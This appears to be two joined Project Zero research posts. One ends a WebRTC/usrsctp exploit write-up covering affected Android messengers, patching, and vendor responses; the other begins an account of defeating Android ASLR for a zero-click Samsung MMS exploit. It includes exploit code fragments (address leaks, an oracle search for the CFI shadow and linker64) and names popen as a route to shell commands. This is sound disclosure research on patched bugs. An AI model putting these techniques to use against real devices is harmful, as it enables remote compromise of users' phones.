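        uint64_t malloc_addr = read_remote_u64(leaked_vtable + off->vtable_to_malloc_got);

        *system_addr = malloc_addr + off->malloc_to_system;
        *gadget_addr = malloc_addr + off->malloc_to_gadget;
}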

Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.

Android Applications

A list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.

It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.

  • Projection: the screen and controls of a mobile application are projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 

Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.

Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.

Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends a lot on how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes it harder for an attacker to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support.

For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.

Name
Installs on Play Store
1B
1B
1B
500M
100M
OK and TamTam (similar apps by same vendor)
100M/10M
100M
50M
10M
10M
10M
10M

This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).

One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed. Update (2020-10-14): The affected application was Mocha. We discovered this vulnerability.

Testing the Exploit

The following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.

Signal

I started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!




This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.

This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.

Google Duo


Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, libjingle_peerconnection_so.so with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.



This vulnerability did not require any user interaction because, like Signal, Duo starts the WebRTC connection before a call is answered.

The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.

Google Hangouts


While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.

Facebook Messenger


Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called librtcR11.so, which dynamically links to usrsctp from another library, libxplat_third-party_usrsctp_usrsctpAndroid.so. Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 

The librtcR11.so library appears to use a version of WebRTC that is roughly six years old, so it was before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The libxplat_third-party_usrsctp_usrsctpAndroid.so library appears to be more modern, but contains the vulnerable code for Bug 376. That said, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application’s vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.

Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called librtcR20.so, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.

Viber


Like Facebook Messenger, Viber version 13.3.0.5 appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.

VK


VK is a social networking app released by Mail.ru in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.

VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.



Regardless, the requirement that a user must choose to accept calls from an attacker before they can call, alongside the requirement that the user answer the call and stay on the line for a few seconds makes this exploit substantially less useful against VK compared to applications without these features.

Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version, however testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.

OK and TamTam


OK and TamTam are similar messaging applications released by the same vendor, also Mail.ru. They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn’t bother also testing TamTam because it is so similar.



Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.

Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.

Discord
Discord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.

JioChat


JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version 3.2.7.4.0211, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.



Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed but whose disclosure period has not yet expired. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.

Slack and ICQ


Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls, it integrates Amazon Chime, which integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, and many other WebRTC bugs.

BOTIM


BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.

Other Application


The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.

Discussion

The Risk of WebRTC

Out of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.

Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.

WebRTC Patching

This research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.

To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, Bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020. Even after it was patched, the bug was not noted in the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or applications that include usrsctp separately from WebRTC, would not be aware of the need to apply this patch.

This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators; in fact, their website inaccurately said that no vulnerabilities had ever been reported in the library. This occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process for considering these bugs’ impact on non-browser integrators at the time. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it had been available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.

Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.

Application Design


Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.

Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.

Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.

Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.

Conclusion

I wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.

Vendor Response

The software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.

WebRTC

The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.

Mail.ru

User security is of the highest priority for all Mail.ru Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.

Signal

We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.

Slack

We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

Posted by Mateusz Jurczyk, Project Zero

This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. Previous posts are linked below:


Furthermore, with this last post, I have uploaded the source code of the MMS exploit to GitHub and the bug tracker. I hope it will serve as a useful reference while reading this blog, and help bootstrap further research in the area of MMS security.

Introduction

Up until this point in the story, I have managed to construct a reliable ASLR oracle delivered via MMS. It works by taking advantage of a buffer overflow to corrupt an android::Bitmap object on the heap and trigger a read from a controlled address, and abuses MMS delivery reports to transmit the oracle output (crash or lack thereof) back to the attacker. In fact, the oracle conveniently makes it possible to test the readability of an arbitrary memory range, not just a single address. On the other hand, due to the crash handling logic on Android, the queries must be sent at least one minute apart from each other, which severely limits the data throughput of the already restricted communication channel.

The current goal is to take the 1-bit information disclosure, and use it to build a high level algorithm capable of remotely leaking full 64-bit addresses in an acceptable number of steps. The acceptability criterion is hard to define precisely, since in real life, it would mostly depend on the tolerable exploit run time specified by the malicious actor. The general rule of thumb is "the fewer, the better", but for the purpose of the exercise, I aimed to design an exploit running in a maximum of 8 × 60 = 480 oracle queries (and thus roughly 480 minutes). This corresponds to the average user's night sleep, and seemed like a plausible attack scenario for a zero-click MMS exploit.

There are two major aspects of defeating ASLR: what do we leak and how do we leak it. As disconnected as they might seem, the two elements are actually closely related. It might not matter which parts of the process address space we intend to use, if they don't overlap with what we can realistically find in memory. With that in mind, I decided to start by familiarizing myself with the typical address space of the com.samsung.android.messaging process, and the overall state of ASLR on Android 10. This would hopefully give me an understanding of some of its weaknesses (if any), and ideally some ideas for bypassing the mitigation. From the outset, the only thing I knew for a fact was the Zygote design, which guaranteed persistent addresses across different instances of a crashing app, and was a crucial part of the attack. I learned the rest mostly by experimenting with a rooted Galaxy Note 10+ phone, as outlined in the sections below.

Android memory layout

Throughout this blog post, we'll be analyzing the Messages memory map found in the /proc/pid/maps pseudo-file. When we look at a few different maps (obtained by rebooting the phone several times to re-randomize the memory layout), we can immediately notice that a majority of mappings, including all shared objects, reside somewhere between 0x6f00000000 and 0x8000000000, with a few exceptions:

  • Mappings of .art, .oat and .vdex files under /system/framework, and some Dalvik-related regions in the low 4 GB of the address space.
  • An isolated mapping of the /system/bin/app_process64 ELF somewhere between 0x5500000000 and 0x6500000000.

Neither of these cases seems particularly interesting right now, although we might want to go back to the low 32-bit mappings if we don't have any success with the higher regions. In general, the usual suspects for leaking (heap areas, libc.so, libhwui.so, …) are all located between 0x6f00000000 - 0x8000000000, which amounts to an effective randomization range of 68 GB. In other words, that's over 24 bits of entropy, a number that is certainly not very encouraging on its own. However, let's not despair just yet and instead let's look closer at how the mappings are laid out in the address space.

We could continue manually inspecting the maps files to look for more insights, but I found that staring at thousands of hexadecimal addresses was not an effective way to reason about the memory layout. As a fan of memory visualization, I wrote a quick Python script to convert a textual maps file to a 2048x8704 bitmap, where each pixel represented one 4 kB page and the color denoted its state and access rights:

  • black for unmapped pages
  • gray for mapped no-access pages
  • green for read-only pages
  • blue for read/write pages
  • red for execute-only pages

Converting three random memory layouts of the Messages process yielded the following results:

Example Android 10 memory layouts

ASLR definitely works, as all memory is mapped at different addresses across reboots. On the other hand, the entropy of the mappings relative to each other is rather low, as they seem to be packed very close together in the scope of each memory map. Furthermore, they add up to a relatively large memory area compared to the 68 GB randomization space. There is one huge continuous read-only (green) memory mapping that particularly stands out:

745c6ea000-745c6ed000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ed000-745c6ee000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c6ee000-745c9b3000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b3000-745c9b4000 r--p 00000000 00:00 0          [anon:cfi shadow]
745c9b4000-745ca89000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca89000-745ca8a000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8a000-745ca8b000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8b000-745ca8c000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8c000-745ca8d000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca8d000-745ca90000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca90000-745ca91000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca91000-745ca92000 r--p 00000000 00:00 0          [anon:cfi shadow]
745ca92000-74dc6ea000 r--p 00000000 00:00 0          [anon:cfi shadow]

This is an auxiliary memory region for Control Flow Integrity (CFI), a security mitigation enabled in Android user-mode code since version 8 and in kernel-mode since Android 9 (source). As explained in the documentation, the shadow area stores information that helps locate the special __cfi_check function for each code page of a CFI-enabled library or executable. There are 2 bytes of metadata reserved for each page in the address space, and the overall CFI shadow spans 2 GB of memory (for instance in the layout above, 0x74dc6ea000 - 0x745c6ea000 = 0x80000000). This means that there is always a continuous 2 GB chunk of memory somewhere in the total 68 GB search space, and other interesting mappings are located in its direct vicinity.

Because the shadow area is readable, it is detectable with our existing ASLR oracle. We can find it by running a linear search of the address space in 2 GB intervals, and once a readable page is detected, by checking if 1 GB directly before or after it is readable too. Such logic will deterministically find a valid address inside the CFI shadow in between 2 and 36 oracle queries (plus potentially one or two for some failed 1 GB checks). From an attacker's perspective, this is fantastic news, as it makes it possible to identify an approximate location of data and code in a very reasonable run time.
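As a rough illustration, the search could be sketched as follows, assuming an oracle(addr, length) helper that returns True when the whole range is readable on the target (a simplification of the real exploit logic):

def find_cfi_shadow(oracle, lo=0x6f00000000, hi=0x8000000000):
    GB = 1 << 30
    addr = lo
    while addr < hi:                              # probe one page every 2 GB
        if oracle(addr, 0x1000):
            # a page inside a >= 2 GB readable region must have 1 GB of readable
            # memory directly before or after it
            if oracle(addr, GB) or oracle(addr - GB, GB):
                return addr                       # some address inside the CFI shadow
        addr += 2 * GB
    return None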

Knowing some readable address is already big progress, but it isn't readily usable yet. However, thanks to the fact that our oracle can probe entire memory ranges, we can use a simple binary search algorithm to determine the beginning or end of any readable area in around log2(n) steps, where n is the maximum expected size of the region expressed in 4 kB pages. For a 2 GB region, that's a fixed number of 19 iterations, so the total number of queries needed to find the bounds of the CFI shadow is between 21 and 55.
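The boundary search might be sketched like this (same assumed oracle; a page-granular binary search over offsets from a known-readable address):

def find_region_end(oracle, addr, max_size=2 << 30):
    lo, hi = 0, max_size                 # offsets from addr; [addr, addr+lo) known readable
    while hi - lo > 0x1000:              # ~log2(max_size / 4 kB) iterations, 19 for 2 GB
        mid = ((lo + hi) // 2) & ~0xFFF  # keep page granularity
        if oracle(addr, mid):            # is [addr, addr + mid) fully readable?
            lo = mid
        else:
            hi = mid
    return addr + lo                     # approximate end of the readable region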

Ironically, CFI is not even enabled for the libhwui.so library that we're exploiting, so while it is technically a mitigation, it worked solely in the attacker's favor in this case. This is not to say that CFI or other defense-in-depth mechanisms are bad to begin with, but rather that they should be carefully designed and scrutinized for regressions that might bring their overall security impact down to a net negative. This specific CFI weakness was fixed by defaulting to PROT_NONE as the access rights of the unused parts of the shadow (more than 99% of its space), and it will ship in a future version of Android. For a somewhat related read on the subject of mitigation (in)security, please see Jann Horn's "Mitigations are attack surface, too" post on the Project Zero blog.

Finding initial cheap exploit gadgets – linker64

Now that we can establish the start and end of the 2 GB CFI region, we should use the information to disclose the base addresses of some nearby libraries. When I inspected the memory maps on my test phone, I noticed that a fixed set of 168 modules was persistently mapped at addresses higher than the shadow, and 54 modules below it. All libraries that I was potentially interested in leaking (e.g. libhwui.so, libc.so) were placed within 128 MB from the end of the CFI shadow, so I decided to focus on that area. Let's zoom in on the three unique memory layouts visualized earlier in this post:

Visualization of the 128 MB of memory after CFI shadow

There aren't too many similarities between these three layouts, and in hindsight, this is expected as the library load order has been randomized in the Android linker since 2015. As a result, there aren't any constant library offsets relative to the CFI shadow that we could readily use. Nonetheless, one region has an exceptionally low variance between all three memory layouts – the bottom green stripe separated from the rest of the libraries with a large non-readable gap (marked in gray):

A memory region with particularly low randomization entropy

What is it?

733e63b000-733e643000 rw-p 00000000 00:00 0       [anon:thread signal stack]
733e643000-733e644000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e644000-733e645000 rw-p 00000000 00:00 0       [anon:Allocate]
733e645000-733e646000 r--p 00000000 00:00 0       [anon:atexit handlers]
733e646000-733e647000 rw-p 00000000 00:00 0       [anon:arc4random data]
733e647000-733e648000 r--p 00000000 00:00 0       [vvar]
733e648000-733e649000 r-xp 00000000 00:00 0       [vdso]
733e649000-733e681000 r--p 00000000 103:09 216    /system/bin/linker64
733e681000-733e752000 r-xp 00038000 103:09 216    /system/bin/linker64
733e752000-733e753000 rw-p 00109000 103:09 216    /system/bin/linker64
733e753000-733e75a000 r--p 0010a000 103:09 216    /system/bin/linker64
733e75a000-733e761000 rw-p 00000000 00:00 0 
733e761000-733e762000 r--p 00000000 00:00 0 
733e762000-733e764000 rw-p 00000000 00:00 0 

As it turns out, it is not one mapping but several adjacent Linux internal regions, with a bulk of the address range taken up by the /apex/com.android.runtime/bin/linker64 module (linked to by /system/bin/linker64). It is the interpreter used by other dynamically linked executables, equivalent to /lib64/ld-linux-x86-64.so.2 on Linux x64:

d2s:/system/bin $ file app_process64
app_process64: ELF shared object, 64-bit LSB arm64, dynamic (/system/bin/linker64)
d2s:/system/bin $

The fact that linker64 is the first ELF loaded in memory by the kernel explains its low address entropy relative to the CFI shadow – it is not subject to the same load order randomization as other libraries. The question is, is it useful for exploitation?

In the firmware of my test Note 10+ device (February 2020 patch level), the linker64 file is 1.52 MB in size. If we open it in IDA Pro (or your favorite disassembler) and browse the functions list, we can immediately spot a number of routines that could be chained together or used on their own to achieve arbitrary code execution. For example, there is a generic __dl_syscall function for invoking system calls, wrappers for specific syscalls operating on files and memory (e.g. __dl_open64, __dl_read, __dl_write, __dl_mmap64, __dl_mprotect), and even functions for starting new processes such as __dl_execl, __dl_execle, __dl_execve, and __dl_execvpe. However, the absolute number one is the __dl_popen function with the following definition:

FILE* popen(const char* cmd, const char* mode);

For all intents and purposes of the attacker, the routine is equivalent to libc's system() in that it executes arbitrary shell commands. The only notable difference is that it also accepts a second argument that has to be a valid, readable pointer. Otherwise, they're essentially the same, which means that we likely won't have to locate libc.so or similar libraries in memory, as linker64 already provides plenty of practical exploitation gadgets. If you're curious how __dl_popen even made its way into linker64, it's through convertMonotonic defined in system/core/liblog/logprint.cpp (called by __dl_android_log_formatLogLine), which uses the function to parse dmesg output:

Decompiled code of the convertMonotonic function

Now that we know we are interested in leaking linker64, we should figure out how many oracle queries it will take. To find a precise answer, I used my test device to generate a corpus of 4000 unique memory maps, which should be a statistically significant sample size for running various kinds of analyses. Within that corpus, the offset of the linker64 base relative to the end of the CFI shadow ranged between 107.94 MB and 108.80 MB, so less than 1 MB of variance. If we also account for any readable regions directly adjacent to the CFI shadow, which cannot be distinguished from the shadow memory by our oracle, the distance to linker64 ranged from 104.05 MB to 108.40 MB. Just to add a bit of versatility in my exploit, I implemented the search starting from a round 100 MB offset from the CFI end.

The logic of identifying linker64 in memory is as follows: we probe a single page in 1088 kB intervals (the span of linker64 in the address space), and when we encounter a readable one, we check if there is a 544 kB accessible region to the right or left of the page – if that's the case, we found some address inside the ELF. We then use the binary search algorithm again, which takes exactly 9 iterations to determine the end of the readable area. After subtracting the size of the module and the few pages of adjacent memory (0x11B000 in total) from the resulting address, we get the base address of linker64.
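A sketch of this logic, reusing the assumed oracle and the find_region_end helper from the earlier sketches (the constants are the ones quoted above; the 120 MB upper search bound is an assumption for the sketch):

def find_linker64(oracle, cfi_end):
    MB = 1 << 20
    step, half = 1088 * 1024, 544 * 1024            # linker64 span and half of it
    for addr in range(cfi_end + 100 * MB, cfi_end + 120 * MB, step):
        if oracle(addr, 0x1000):
            # a page inside linker64 has 544 kB of readable memory on one side of it
            if oracle(addr, half) or oracle(addr - half, half):
                end = find_region_end(oracle, addr, max_size=step)  # ~9 iterations
                return end - 0x11B000               # module size + adjacent pages
    return None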

With this logic, my testing indicates that the leaking of CFI shadow + linker64 takes between 38 and 75 oracle queries, with an average of 56.45 queries on the memory maps corpus mentioned before. This translates to around 40-80 minutes of exploit run time, which is a very satisfactory result so far.

Locating libhwui.so in memory

At this point in the research, I spent some time trying to complete the attack based solely on the linker64 base address. The key piece of the puzzle was a suitable gadget function which had to meet the following conditions:

  • Had its address stored somewhere in the static memory of the module, such that we could point the fake vtable of the android::Bitmap object there and trigger a call to the function.
  • Called a function pointer loaded from the first argument, preferably with parameters that were either controlled or pointed to controlled data.

Unfortunately I didn't manage to find any applicable gadgets during my brief manual analysis, but I don't rule out the possibility that they exist and perhaps could be recognized with a more automated approach. This is left as an open challenge to the reader, and I'll be very interested to learn how RCE can be achieved with the help of linker64 alone.

As we can remember from Part 3, it is possible to call a controlled function pointer with two arbitrary arguments by corrupting the android::Bitmap.mPixelStorage.external structure fields. The only requirement is that we must know the base address of libhwui.so, to restore the Bitmap vtable pointer to its original value in the linear buffer overflow. And so, I started contemplating how the specific library could be efficiently recognized among all the other 168 shared objects loaded in random order within ~100 MB of the CFI shadow. I turned my eyes to the memory visualization bitmaps again.

For simplicity, let's eliminate blue from the color palette of the memory map (previously used for rw- mappings), and use green for all kinds of readable pages (incl. r--, rw- and r-x). This is closer to how the ASLR oracle "sees" memory, and it should make it easier to understand the layout of memory we're operating on:

